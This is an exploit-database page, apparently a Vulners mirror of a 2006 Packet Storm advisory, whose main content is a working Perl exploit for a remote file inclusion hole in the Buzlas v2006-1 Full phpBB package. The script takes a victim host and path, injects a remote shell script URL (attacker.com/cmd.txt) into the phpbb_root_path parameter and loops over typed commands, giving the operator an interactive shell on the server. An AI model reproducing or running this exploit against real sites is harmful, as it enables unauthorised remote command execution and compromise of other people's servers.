Lucene search

K

buzlas-rfi.txt

🗓️ 18 Oct 2006 00:00:00Reported by nima salehiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Remote File Include Vulnerability in Buzlas v2006-1 Full allows remote attackers to execute arbitrary commands via an include paramete

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
  
####################################################################################  
# #  
# Buzlas v2006-1 Full #  
# #  
# Class: Remote File Include Vulnerability #  
# #  
# Patch: unavailable #  
# #  
# Date: 2006/10/12 #  
# #  
# Remote: Yes #  
# #  
# Type: high #  
# #  
# Site: http://www.buzlas.net/dosyalar/phpbb/premod/Buzlas%20v2006-1%20Full.zip #  
# #  
####################################################################################  
  
  
use IO::Socket;  
use LWP::Simple;  
  
$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script  
  
print "\n";  
print "######################################################################\n";  
print "# #\n";  
print "# Buzlas <= v2006-1 Full Remote File Include Vulnerability #\n";  
print "# Bug found By : Ashiyane Corporation #\n";  
print "# Email: nima salehi nima[at]ashiyane.ir #\n";  
print "# Web Site : www.Ashiyane.ir #\n";  
print "# #\n";  
print "######################################################################\n";  
  
  
if (@ARGV < 2)  
{  
print "\n Usage: Ashiyane.pl [host] [path] ";  
print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n";  
exit;  
}  
  
  
$host=$ARGV[0];  
$path=$ARGV[1];  
$vul="includes/archive/archive_topic.php?phpbb_root_path="  
  
print "Type Your Commands ( uname -a )\n";  
print "For Exiit Type END\n";  
  
print "<Shell> ";$cmd = <STDIN>;  
  
while($cmd !~ "END") {  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";  
  
print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Accept: */*\r\n";  
print $socket "Connection: close\r\n\n";  
  
while ($raspuns = <$socket>)  
{  
print $raspuns;  
}  
  
print "<Shell> ";  
$cmd = <STDIN>;  
}  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo